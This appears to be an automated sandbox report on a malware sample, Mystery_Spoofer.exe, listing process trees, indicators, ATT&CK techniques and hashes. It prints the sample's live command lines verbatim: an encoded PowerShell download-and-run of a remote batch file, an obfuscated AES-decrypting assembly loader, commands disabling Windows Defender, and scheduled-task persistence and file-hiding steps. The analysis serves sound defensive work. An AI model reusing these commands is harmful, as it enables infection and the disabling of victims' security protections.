3696	powershell.exe
1016	ASFUCK.exe
1384	powershell.exe
1384	powershell.exe
1308	powershell.exe
1308	powershell.exe
2284	powershell.exe
2284	powershell.exe
1016	ASFUCK.exe
3292	powershell.exe
3292	powershell.exe
1016	ASFUCK.exe
2272	powershell.exe
3456	powershell.exe
536	powershell.exe
536	powershell.exe
1016	ASFUCK.exe
2276	powershell.exe
4888	powershell.exe
1016	ASFUCK.exe
2712	powershell.exe
1016	ASFUCK.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exeFile.bat.exepowershell.exepowershell.exeASFUCK.exepowershell.exeQUFUCK.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeNvidiaXdriver.exeOneDriveStandaloneAPIMethod.exeWindows.exeNvidiaXdriver.exeNvidiaXdriver.exeNvidiaXdriver.exe

description	pid	process
Token: SeDebugPrivilege	4640	powershell.exe
Token: SeDebugPrivilege	4288	File.bat.exe
Token: SeDebugPrivilege	2468	powershell.exe
Token: SeDebugPrivilege	2352	powershell.exe
Token: SeDebugPrivilege	1016	ASFUCK.exe
Token: SeDebugPrivilege	2284	powershell.exe
Token: SeDebugPrivilege	4400	QUFUCK.exe
Token: SeDebugPrivilege	3292	powershell.exe
Token: SeDebugPrivilege	2272	powershell.exe
Token: SeDebugPrivilege	536	powershell.exe
Token: SeDebugPrivilege	3456	powershell.exe
Token: SeDebugPrivilege	2276	powershell.exe
Token: SeDebugPrivilege	4888	powershell.exe
Token: SeDebugPrivilege	2712	powershell.exe
Token: SeDebugPrivilege	1384	powershell.exe
Token: SeDebugPrivilege	3696	powershell.exe
Token: SeDebugPrivilege	1308	powershell.exe
Token: SeDebugPrivilege	5164	NvidiaXdriver.exe
Token: SeDebugPrivilege	3376	OneDriveStandaloneAPIMethod.exe
Token: SeDebugPrivilege	5380	Windows.exe
Token: 33	5380	Windows.exe
Token: SeIncBasePriorityPrivilege	5380	Windows.exe
Token: 33	5380	Windows.exe
Token: SeIncBasePriorityPrivilege	5380	Windows.exe
Token: 33	5380	Windows.exe
Token: SeIncBasePriorityPrivilege	5380	Windows.exe
Token: SeDebugPrivilege	5856	NvidiaXdriver.exe
Token: 33	5380	Windows.exe
Token: SeIncBasePriorityPrivilege	5380	Windows.exe
Token: 33	5380	Windows.exe
Token: SeIncBasePriorityPrivilege	5380	Windows.exe
Token: 33	5380	Windows.exe
Token: SeIncBasePriorityPrivilege	5380	Windows.exe
Token: 33	5380	Windows.exe
Token: SeIncBasePriorityPrivilege	5380	Windows.exe
Token: 33	5380	Windows.exe
Token: SeIncBasePriorityPrivilege	5380	Windows.exe
Token: 33	5380	Windows.exe
Token: SeIncBasePriorityPrivilege	5380	Windows.exe
Token: 33	5380	Windows.exe
Token: SeIncBasePriorityPrivilege	5380	Windows.exe
Token: SeDebugPrivilege	1304	NvidiaXdriver.exe
Token: 33	5380	Windows.exe
Token: SeIncBasePriorityPrivilege	5380	Windows.exe
Token: 33	5380	Windows.exe
Token: SeIncBasePriorityPrivilege	5380	Windows.exe
Token: 33	5380	Windows.exe
Token: SeIncBasePriorityPrivilege	5380	Windows.exe
Token: 33	5380	Windows.exe
Token: SeIncBasePriorityPrivilege	5380	Windows.exe
Token: 33	5380	Windows.exe
Token: SeIncBasePriorityPrivilege	5380	Windows.exe
Token: 33	5380	Windows.exe
Token: SeIncBasePriorityPrivilege	5380	Windows.exe
Token: 33	5380	Windows.exe
Token: SeIncBasePriorityPrivilege	5380	Windows.exe
Token: SeDebugPrivilege	4580	NvidiaXdriver.exe
Token: 33	5380	Windows.exe
Token: SeIncBasePriorityPrivilege	5380	Windows.exe
Token: 33	5380	Windows.exe
Token: SeIncBasePriorityPrivilege	5380	Windows.exe
Token: 33	5380	Windows.exe
Token: SeIncBasePriorityPrivilege	5380	Windows.exe
Token: 33	5380	Windows.exe

Suspicious use of SetWindowsHookEx 3 IoCs

Processes:

SearchApp.exeSearchApp.exeSearchApp.exe

pid process

5508 SearchApp.exe
620 SearchApp.exe
1400 SearchApp.exe

pid	process
5508	SearchApp.exe
620	SearchApp.exe
1400	SearchApp.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Mystery_Spoofer.exepowershell.execmd.exeFile.bat.exeWScript.exeWScript.execmd.exeQUFUCK.exeWindows.exeNvidiaXdriver.exe

description	pid	process	target process
PID 908 wrote to memory of 4640	908	Mystery_Spoofer.exe	powershell.exe
PID 908 wrote to memory of 4640	908	Mystery_Spoofer.exe	powershell.exe
PID 4640 wrote to memory of 4420	4640	powershell.exe	cmd.exe
PID 4640 wrote to memory of 4420	4640	powershell.exe	cmd.exe
PID 4420 wrote to memory of 4288	4420	cmd.exe	File.bat.exe
PID 4420 wrote to memory of 4288	4420	cmd.exe	File.bat.exe
PID 4288 wrote to memory of 2468	4288	File.bat.exe	powershell.exe
PID 4288 wrote to memory of 2468	4288	File.bat.exe	powershell.exe
PID 4288 wrote to memory of 2352	4288	File.bat.exe	powershell.exe
PID 4288 wrote to memory of 2352	4288	File.bat.exe	powershell.exe
PID 4288 wrote to memory of 2760	4288	File.bat.exe	Windows.exe
PID 4288 wrote to memory of 2760	4288	File.bat.exe	Windows.exe
PID 4288 wrote to memory of 2760	4288	File.bat.exe	Windows.exe
PID 4288 wrote to memory of 4400	4288	File.bat.exe	QUFUCK.exe
PID 4288 wrote to memory of 4400	4288	File.bat.exe	QUFUCK.exe
PID 4288 wrote to memory of 1016	4288	File.bat.exe	ASFUCK.exe
PID 4288 wrote to memory of 1016	4288	File.bat.exe	ASFUCK.exe
PID 4288 wrote to memory of 1016	4288	File.bat.exe	ASFUCK.exe
PID 4288 wrote to memory of 732	4288	File.bat.exe	WScript.exe
PID 4288 wrote to memory of 732	4288	File.bat.exe	WScript.exe
PID 4288 wrote to memory of 992	4288	File.bat.exe	cmd.exe
PID 4288 wrote to memory of 992	4288	File.bat.exe	cmd.exe
PID 732 wrote to memory of 3508	732	WScript.exe	WScript.exe
PID 732 wrote to memory of 3508	732	WScript.exe	WScript.exe
PID 3508 wrote to memory of 2284	3508	WScript.exe	powershell.exe
PID 3508 wrote to memory of 2284	3508	WScript.exe	powershell.exe
PID 3508 wrote to memory of 3292	3508	WScript.exe	powershell.exe
PID 3508 wrote to memory of 3292	3508	WScript.exe	powershell.exe
PID 3508 wrote to memory of 2272	3508	WScript.exe	powershell.exe
PID 3508 wrote to memory of 2272	3508	WScript.exe	powershell.exe
PID 3508 wrote to memory of 536	3508	WScript.exe	powershell.exe
PID 3508 wrote to memory of 536	3508	WScript.exe	powershell.exe
PID 992 wrote to memory of 4648	992	cmd.exe	choice.exe
PID 992 wrote to memory of 4648	992	cmd.exe	choice.exe
PID 3508 wrote to memory of 3456	3508	WScript.exe	powershell.exe
PID 3508 wrote to memory of 3456	3508	WScript.exe	powershell.exe
PID 3508 wrote to memory of 2276	3508	WScript.exe	powershell.exe
PID 3508 wrote to memory of 2276	3508	WScript.exe	powershell.exe
PID 3508 wrote to memory of 4888	3508	WScript.exe	powershell.exe
PID 3508 wrote to memory of 4888	3508	WScript.exe	powershell.exe
PID 3508 wrote to memory of 2712	3508	WScript.exe	powershell.exe
PID 3508 wrote to memory of 2712	3508	WScript.exe	powershell.exe
PID 3508 wrote to memory of 1384	3508	WScript.exe	powershell.exe
PID 3508 wrote to memory of 1384	3508	WScript.exe	powershell.exe
PID 3508 wrote to memory of 3696	3508	WScript.exe	powershell.exe
PID 3508 wrote to memory of 3696	3508	WScript.exe	powershell.exe
PID 3508 wrote to memory of 1308	3508	WScript.exe	powershell.exe
PID 3508 wrote to memory of 1308	3508	WScript.exe	powershell.exe
PID 4400 wrote to memory of 624	4400	QUFUCK.exe	schtasks.exe
PID 4400 wrote to memory of 624	4400	QUFUCK.exe	schtasks.exe
PID 992 wrote to memory of 920	992	cmd.exe	attrib.exe
PID 992 wrote to memory of 920	992	cmd.exe	attrib.exe
PID 4400 wrote to memory of 5164	4400	QUFUCK.exe	NvidiaXdriver.exe
PID 4400 wrote to memory of 5164	4400	QUFUCK.exe	NvidiaXdriver.exe
PID 2760 wrote to memory of 5380	2760	Windows.exe	Windows.exe
PID 2760 wrote to memory of 5380	2760	Windows.exe	Windows.exe
PID 2760 wrote to memory of 5380	2760	Windows.exe	Windows.exe
PID 2760 wrote to memory of 5408	2760	Windows.exe	attrib.exe
PID 2760 wrote to memory of 5408	2760	Windows.exe	attrib.exe
PID 2760 wrote to memory of 5408	2760	Windows.exe	attrib.exe
PID 5164 wrote to memory of 5856	5164	NvidiaXdriver.exe	NvidiaXdriver.exe
PID 5164 wrote to memory of 5856	5164	NvidiaXdriver.exe	NvidiaXdriver.exe
PID 5164 wrote to memory of 5916	5164	NvidiaXdriver.exe	schtasks.exe
PID 5164 wrote to memory of 5916	5164	NvidiaXdriver.exe	schtasks.exe

Views/modifies file attributes 1 TTPs 4 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exeattrib.exeattrib.exeattrib.exe

pid process

920 attrib.exe
5408 attrib.exe
4156 attrib.exe
4896 attrib.exe

pid	process
920	attrib.exe
5408	attrib.exe
4156	attrib.exe
4896	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Mystery_Spoofer.exe
"C:\Users\Admin\AppData\Local\Temp\Mystery_Spoofer.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:908

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHIAeQBpACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAyADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AOQA3ADQANQAxADQAOAAxADIAMgAxADIAMAA5ADcAMAA0ADQALwAxADAAMgAzADUANgAzADgAOAAzADMANwA5ADYAOAA3ADUANgA0AC8AegBiAHoAbwBiAC4AYgBhAHQAJwAsACAAPAAjAHoAeQBzACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAYwBmAHEAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcgBtAGYAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcARgBpAGwAZQAuAGIAYQB0ACcAKQApADwAIwBrAGoAaAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBkAHkAagAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcABqAHoAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcARgBpAGwAZQAuAGIAYQB0ACcAKQA8ACMAbgBqAHUAIwA+AA=="
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4640

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\File.bat" "
3⤵
- Suspicious use of WriteProcessMemory
PID:4420

C:\Users\Admin\AppData\Local\Temp\File.bat.exe
"C:\Users\Admin\AppData\Local\Temp\File.bat.exe" -noprofile -w hidden -ep bypass -c "function WgucG($Uodhr){$Uodhr.Replace('@', '');}$sK = WgucG 'Tr@@ansf@or@mFin@@@alB@@lock';$RR = WgucG '@C@rea@@@t@e@Decryptor';$xI = WgucG 'Re@a@@dA@llT@ext';$Sd = WgucG 'Lo@a@d';$Ct = WgucG '@I@nv@oke';$pP = WgucG 'F@@r@omB@@@@ase64S@tring';$or = WgucG 'Sy@stem.@S@e@@cur@ity@@@.C@@ryp@@togr@a@ph@y.@A@@esManaged';$Cl = WgucG 'E@n@@@tryP@oint';function pcoJJ($giOnX){$FsYVF = New-Object $or;$FsYVF.Mode = [System.Security.Cryptography.CipherMode]::CBC;$FsYVF.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$FsYVF.Key = [System.Convert]::$pP('xla865a/D0efyXtKi+MsTolysKcBNSHeqrT6B20r4cs=');$FsYVF.IV = [System.Convert]::$pP('U+48IL+joGA3GLaVRHFHdA==');$SlYQL = $FsYVF.$RR();$return_var = $SlYQL.$sK($giOnX, 0, $giOnX.Length);$SlYQL.Dispose();$FsYVF.Dispose();$return_var;}function zXekR($giOnX){$aukND = New-Object System.IO.MemoryStream(, $giOnX);$KUWkL = New-Object System.IO.MemoryStream;$TkPLo = New-Object System.IO.Compression.GZipStream($aukND, [IO.Compression.CompressionMode]::Decompress);$TkPLo.CopyTo($KUWkL);$TkPLo.Dispose();$aukND.Dispose();$KUWkL.Dispose();$KUWkL.ToArray();}function yQJVv($giOnX, $pKJqO){$ieFao = [System.Reflection.Assembly]::$Sd([byte[]]$giOnX);$OVasD = $ieFao.$Cl;$OVasD.$Ct($null, $pKJqO);}$dHMft = [System.IO.File]::$xI('C:\Users\Admin\AppData\Local\Temp\File.bat').Split([Environment]::NewLine);foreach ($RwoRd in $dHMft) {if ($RwoRd.StartsWith(':: ')){$gywyi = $RwoRd.Substring(3);break;}}$lvzUE = [string[]]$gywyi.Split('\');$zVChf = zXekR (pcoJJ ([Convert]::$pP($lvzUE[0])));$frCvg = zXekR (pcoJJ ([Convert]::$pP($lvzUE[1])));yQJVv $frCvg $null;yQJVv $zVChf (, [string[]] (''));"
4⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4288

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGMAagB1ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHkAbABwACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAJwAsACcAJwAsACcATwBLACcALAAnAFEAdQBlAHMAdABpAG8AbgAnACkAPAAjAGIAcgBkACMAPgA="
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2468

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAcQBjACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGMAaQB3ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGYAYgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AbABnACMAPgA="
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2352

C:\Users\Admin\AppData\Local\Temp\Windows.exe
"C:\Users\Admin\AppData\Local\Temp\Windows.exe"
5⤵
- Executes dropped EXE
- Checks computer location settings
- Drops startup file
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:2760

C:\Users\Admin\AppData\Roaming\Windows.exe
"C:\Users\Admin\AppData\Roaming\Windows.exe"
6⤵
- Executes dropped EXE
- Drops startup file
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
PID:5380

C:\Windows\SysWOW64\attrib.exe
attrib +h +r +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe"
7⤵
- Drops startup file
- Views/modifies file attributes
PID:4156

C:\Windows\SysWOW64\attrib.exe
attrib +h +r +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Windows.exe"
7⤵
- Views/modifies file attributes
PID:4896

C:\Windows\SysWOW64\attrib.exe
attrib +h +r +s "C:\Users\Admin\AppData\Roaming\Windows.exe"
6⤵
- Views/modifies file attributes
PID:5408

C:\Users\Admin\AppData\Local\Temp\QUFUCK.exe
"C:\Users\Admin\AppData\Local\Temp\QUFUCK.exe"
5⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4400

C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "NvidiaXdriver" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\QUFUCK.exe" /rl HIGHEST /f
6⤵
- Creates scheduled task(s)
PID:624

C:\Program Files (x86)\SubDir\NvidiaXdriver.exe
"C:\Program Files (x86)\SubDir\NvidiaXdriver.exe"
6⤵
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5164

C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "NvidiaXdriver" /sc ONLOGON /tr "C:\Program Files (x86)\SubDir\NvidiaXdriver.exe" /rl HIGHEST /f
7⤵
- Creates scheduled task(s)
PID:5856

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /tn "WINDOWSSYSTEMHOST" /tr "C:\Program Files (x86)\SubDir\NvidiaXdriver.exe" /sc MINUTE /MO 1
7⤵
- Creates scheduled task(s)
PID:5916

C:\Users\Admin\AppData\Local\Temp\ASFUCK.exe
"C:\Users\Admin\AppData\Local\Temp\ASFUCK.exe"
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1016

C:\Windows\SysWOW64\schtasks.exe
"schtasks.exe" /create /tn OneDriveStandaloneAPIMethod /tr "C:\Users\Admin\AppData\Roaming\Microsoft APIMethod\OneDriveStandaloneAPIMethod.exe" /st 16:49 /du 23:59 /sc daily /ri 1 /f
6⤵
- Creates scheduled task(s)
PID:676

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpF5BA.tmp.bat""
6⤵
PID:1440

C:\Users\Admin\AppData\Roaming\Microsoft APIMethod\OneDriveStandaloneAPIMethod.exe
"C:\Users\Admin\AppData\Roaming\Microsoft APIMethod\OneDriveStandaloneAPIMethod.exe"
7⤵
- Executes dropped EXE
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of AdjustPrivilegeToken
PID:3376

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3376 -s 1968
8⤵
- Program crash
PID:5552

C:\Windows\SysWOW64\timeout.exe
timeout 4
7⤵
- Delays execution with timeout.exe
PID:476

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\script.vbs_.vbs"
5⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:732

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\script.vbs_.vbs" /elevate
6⤵
- Modifies Windows Defender Real-time Protection settings
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3508

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBehaviorMonitoring $true
7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3292

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2272

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:536

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3456

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2276

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4888

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true
7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2284

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2712

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1384

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3696

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1308

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c choice /c y /n /d y /t 1 & attrib -h -s "C:\Users\Admin\AppData\Local\Temp\File.bat.exe" & del "C:\Users\Admin\AppData\Local\Temp\File.bat.exe"
5⤵
- Suspicious use of WriteProcessMemory
PID:992

C:\Windows\system32\choice.exe
choice /c y /n /d y /t 1
6⤵
PID:4648

C:\Windows\system32\attrib.exe
attrib -h -s "C:\Users\Admin\AppData\Local\Temp\File.bat.exe"
6⤵
- Views/modifies file attributes
PID:920

C:\Program Files (x86)\SubDir\NvidiaXdriver.exe
"C:\Program Files (x86)\SubDir\NvidiaXdriver.exe"
1⤵
- Executes dropped EXE
- Checks computer location settings
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
PID:5856

C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "NvidiaXdriver" /sc ONLOGON /tr "C:\Program Files (x86)\SubDir\NvidiaXdriver.exe" /rl HIGHEST /f
2⤵
- Creates scheduled task(s)
PID:4732

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /tn "WINDOWSSYSTEMHOST" /tr "C:\Program Files (x86)\SubDir\NvidiaXdriver.exe" /sc MINUTE /MO 1
2⤵
- Creates scheduled task(s)
PID:1904

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5508

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:620

C:\Windows\system32\werfault.exe
werfault.exe /hc /shared Global\7bb1f5bb118c489e88db8854d0f86966 /t 4576 /p 620
1⤵
PID:1668

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 3376 -ip 3376
1⤵
PID:396

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:1400

C:\Program Files (x86)\SubDir\NvidiaXdriver.exe
"C:\Program Files (x86)\SubDir\NvidiaXdriver.exe"
1⤵
- Executes dropped EXE
- Checks computer location settings
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
PID:1304

C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "NvidiaXdriver" /sc ONLOGON /tr "C:\Program Files (x86)\SubDir\NvidiaXdriver.exe" /rl HIGHEST /f
2⤵
- Creates scheduled task(s)
PID:5796

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /tn "WINDOWSSYSTEMHOST" /tr "C:\Program Files (x86)\SubDir\NvidiaXdriver.exe" /sc MINUTE /MO 1
2⤵
- Creates scheduled task(s)
PID:5364

C:\Program Files (x86)\SubDir\NvidiaXdriver.exe
"C:\Program Files (x86)\SubDir\NvidiaXdriver.exe"
1⤵
- Executes dropped EXE
- Checks computer location settings
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
PID:4580

C:\Windows\system32\schtasks.exe
"schtasks" /create /tn "NvidiaXdriver" /sc ONLOGON /tr "C:\Program Files (x86)\SubDir\NvidiaXdriver.exe" /rl HIGHEST /f
2⤵
- Creates scheduled task(s)
PID:3336

C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /tn "WINDOWSSYSTEMHOST" /tr "C:\Program Files (x86)\SubDir\NvidiaXdriver.exe" /sc MINUTE /MO 1
2⤵
- Creates scheduled task(s)
PID:1660

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Hidden Files and Directories

T1158

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

Hidden Files and Directories

T1158

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\SubDir\NvidiaXdriver.exe
Filesize
441KB

MD5
53544a79f1385c3d2a0aeb67ac9ba34a

SHA1
c478a75a676458f582894768ab771c2382cebf19

SHA256
2f98fd7bd21a666a0488e26c537f0bd3fc1c03d02023efc669b6cc5654cacb82

SHA512
7caf421a00071f6402ff022b60ebad247fc2f43f7cda8b190b9f5dfff577ed751d87f993d006c12f9c8bd1c45da3f9694ebf8d49d674259eec5d0b240dcc82c9

Download Submit
C:\Program Files (x86)\SubDir\NvidiaXdriver.exe
Filesize
441KB

MD5
53544a79f1385c3d2a0aeb67ac9ba34a

SHA1
c478a75a676458f582894768ab771c2382cebf19

SHA256
2f98fd7bd21a666a0488e26c537f0bd3fc1c03d02023efc669b6cc5654cacb82

SHA512
7caf421a00071f6402ff022b60ebad247fc2f43f7cda8b190b9f5dfff577ed751d87f993d006c12f9c8bd1c45da3f9694ebf8d49d674259eec5d0b240dcc82c9

Download Submit
C:\Program Files (x86)\SubDir\NvidiaXdriver.exe
Filesize
441KB

MD5
53544a79f1385c3d2a0aeb67ac9ba34a

SHA1
c478a75a676458f582894768ab771c2382cebf19

SHA256
2f98fd7bd21a666a0488e26c537f0bd3fc1c03d02023efc669b6cc5654cacb82

SHA512
7caf421a00071f6402ff022b60ebad247fc2f43f7cda8b190b9f5dfff577ed751d87f993d006c12f9c8bd1c45da3f9694ebf8d49d674259eec5d0b240dcc82c9

Download Submit
C:\Program Files (x86)\SubDir\NvidiaXdriver.exe
Filesize
441KB

MD5
53544a79f1385c3d2a0aeb67ac9ba34a

SHA1
c478a75a676458f582894768ab771c2382cebf19

SHA256
2f98fd7bd21a666a0488e26c537f0bd3fc1c03d02023efc669b6cc5654cacb82

SHA512
